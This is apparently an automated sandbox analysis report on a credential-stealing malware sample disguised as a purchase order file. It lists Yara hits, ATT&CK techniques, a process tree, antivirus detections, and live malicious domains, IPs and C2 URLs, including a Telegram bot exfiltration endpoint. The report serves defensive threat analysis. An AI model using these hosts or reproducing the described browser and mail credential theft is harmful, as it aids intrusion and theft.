                  Source: Yara match | File source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR
                  Source: Yara match | File source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1457423473.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match | File source: 00000009.00000002.2696625029.000000000794C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2671075234.000000000791C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 7796, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR
                  Source: Yara match | File source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1457423473.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | LSASS Driver (2) | Abuse Elevation Control Mechanism (1) | Disable or Modify Tools (11) | OS Credential Dumping (1) | System Time Discovery (1) | Taint Shared Content (1) | Archive Collected Data (11) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job (1) | DLL Side-Loading (1) | LSASS Driver (2) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (21) | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | Service Execution (2) | Windows Service (1) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Email Collection (1) | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Scheduled Task/Job (1) | Windows Service (1) | Obfuscated Files or Information (3) | NTDS | System Information Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (14) | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (311) | Software Packing (23) | LSA Secrets | Security Software Discovery (121) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Scheduled Task/Job (1) | Timestomp (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (31) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Process Discovery (2) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Masquerading (322) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Virtualization/Sandbox Evasion (31) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (311) | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Behavior Graph ID: 1564874
                  Sample: RFQ_PO N89397-GM7287-Order.bat.exe | Startdate: 28/11/2024 | Architecture: WINDOWS | Score: 100
                  Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 17 other signatures
                  Sample-level network: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); zlenh.biz; 19 other IPs or domains

                  RFQ_PO N89397-GM7287-Order.bat.exe (started)
                      dropped: C:\Users\user\AppData\...\YRtQgzFlDnVSru.exe (PE32); C:\...\YRtQgzFlDnVSru.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpE707.tmp (XML); C:\...\RFQ_PO N89397-GM7287-Order.bat.exe.log (ASCII)
                      signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
                      vbc.exe (started)
                          network: vjaxhpbji.biz 82.112.184.197 (ports 49806, 49808, 49852; FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU, Russian Federation); reallyfreegeoip.org 104.21.67.152 (ports 443, 49725, 49759; CLOUDFLARENETUS, United States); 4 other IPs or domains
                          dropped: C:\Windows\System32\wbengine.exe (PE32+); C:\Windows\System32\wbem\WmiApSrv.exe (PE32+); C:\Windows\System32\vds.exe (PE32+); 150 other malicious files
                          signatures: Tries to steal Mail credentials (via file / registry access); Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
                      powershell.exe (started)
                          signatures: Loading BitLocker PowerShell Module
                          conhost.exe (started)
                          WmiPrvSE.exe (started)
                      powershell.exe (started)
                          conhost.exe (started)
                      schtasks.exe (started)
                          conhost.exe (started)
                  YRtQgzFlDnVSru.exe (started)
                      signatures: Injects a PE file into a foreign processes
                      vbc.exe (started)
                          signatures: Tries to harvest and steal browser information (history, passwords, etc)
                      schtasks.exe (started)
                          conhost.exe (started)
                  elevation_service.exe (started)
                      dropped: C:\Windows\System32\sppsvc.exe (PE32+)
                      signatures: Infects executable files (exe, dll, sys, html); Found direct / indirect Syscall (likely to bypass EDR)
                  20 other processes
                      signatures: Creates files inside the volume driver (system volume information); Creates files in the system32 config directory; Contains functionality to behave differently if execute on a Russian/Kazak computer

                  Source | Detection | Scanner | Label
                  RFQ_PO N89397-GM7287-Order.bat.exe | 29% | ReversingLabs |
                  RFQ_PO N89397-GM7287-Order.bat.exe | 100% | Avira | HEUR/AGEN.1305452
                  RFQ_PO N89397-GM7287-Order.bat.exe | 100% | Joe Sandbox ML |
                  Source | Detection | Scanner | Label
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
Name | IP | Active | Malicious
przvgke.biz | 172.234.222.138 | true | true
lpuegx.biz | 82.112.184.197 | true | true
ssbzmoy.biz | 18.141.10.107 | true | false
vjaxhpbji.biz | 82.112.184.197 | true | true
xlfhhhm.biz | 47.129.31.212 | true | false
reallyfreegeoip.org | 104.21.67.152 | true | true
vcddkls.biz | 18.141.10.107 | true | false
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false
checkip.dyndns.com | 132.226.247.73 | true | false
zlenh.biz | unknown | unknown | true
checkip.dyndns.org | unknown | unknown | true
knjghuig.biz | unknown | unknown | true
pywolwnvd.biz | unknown | unknown | true
ifsaia.biz | unknown | unknown | true
uhxqin.biz | unknown | unknown | true
time.windows.com | unknown | unknown | true
cvgrf.biz | unknown | unknown | true
saytjshyf.biz | unknown | unknown | true
npukfztj.biz | unknown | unknown | true
anpmnmxo.biz | unknown | unknown | true
Name | Malicious
http://ssbzmoy.biz/j | false
http://lpuegx.biz/oxlmrobhj | true
http://przvgke.biz/lkgggwxh | true
http://vjaxhpbji.biz/fmyrcucxukod | true
http://checkip.dyndns.org/ | false
http://przvgke.biz/hndiufmakse | true
http://lpuegx.biz/kpnskvgb | true
https://reallyfreegeoip.org/xml/8.46.123.228 | false
http://vjaxhpbji.biz/prgqqrrnmmetm | true
http://przvgke.biz/hcvpcb | true
http://lpuegx.biz/lsfncqfq | true
http://przvgke.biz/lxda | true
http://vjaxhpbji.biz/oitulo | true
http://lpuegx.biz/algtvyj | true
http://vjaxhpbji.biz/rdl | true
http://xlfhhhm.biz/agmjd | false
Name | Source | Malicious
http://xlfhhhm.biz/ | vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp | false
https://api.telegram.org/bot | vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp | false
http://tempuri.org/DataSet1.xsd | alg.exe, 0000000B.00000003.2062072594.0000000000B90000.00000004.00001000.00020000.00000000.sdmp | false
http://82.112.184.197:80/lsfncqfq | vbc.exe, 00000009.00000002.2747734535.0000000009D04000.00000004.00000020.00020000.00000000.sdmp | false
http://172.234.222.138/lkgggwxh | alg.exe, 0000000B.00000003.1672024294.000000000051E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1750326950.000000000051E000.00000004.00000020.00020000.00000000.sdmp | false
http://18.141.10.107/ | alg.exe, 0000000B.00000003.1524192545.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | false
http://172.234.222.138:80/lkgggwxh | alg.exe, 0000000B.00000003.1750547017.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1672024294.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmp | false
http://checkip.dyndns.org/h | vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp | false
http://47.129.31.212/ | vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmp | false
http://checkip.dyndns.org/p | vbc.exe, 00000009.00000002.2696625029.00000000077F6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp | false
http://checkip.dyndns. | vbc.exe, 00000009.00000002.2696625029.00000000077FA000.00000004.00000800.00020000.00000000.sdmp | false
http://reallyfreegeoip.org | vbc.exe, 00000009.00000002.2696625029.0000000007892000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007862000.00000004.00000800.00020000.00000000.sdmp | false
http://checkip.dyndns.P | vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp | false
http://82.112.184.197:80/algtvyj | alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmp | false
https://reallyfreegeoip.orgLL( | vbc.exe, 0000002A.00000002.2671075234.0000000007779000.00000004.00000800.00020000.00000000.sdmp | false
http://checkip.dyndns.com | vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmp | false
